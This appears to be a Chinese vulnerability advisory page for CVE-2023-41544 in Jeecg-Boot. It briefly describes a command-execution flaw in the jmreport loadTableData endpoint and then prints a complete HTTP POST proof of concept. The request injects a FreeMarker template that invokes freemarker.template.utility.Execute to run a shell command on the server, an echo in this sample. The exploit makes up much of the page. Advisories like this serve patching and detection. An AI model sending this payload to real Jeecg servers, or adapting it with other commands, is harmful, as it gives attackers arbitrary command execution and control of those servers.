Jeecg-Boot loadTableData 远程代码执行(CVE-2023-41544)

日期: 2024-02-22 | 影响软件: Jeecg | POC: 已公开

漏洞描述

Jeecg Boot（或者称为Jeecg-Boot）是一款基于代码生成器的开源企业级快速开发平台，专注于开发后台管理系统、企业信息管理系统（MIS）等应用。它提供了一系列工具和模板，帮助开发者快速构建和部署现代化的Web 应用程序。该系统存 loadTableData 接口在命令执行漏洞，攻击者可执行任意命令获取服务器权限

PoC代码

POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 174
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

{"dbSource":"","sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"echo 8888888888\")}'","tableName":"test_demo);","pageNo":1,"pageSize":10}

漏洞描述

PoC代码

相关漏洞推荐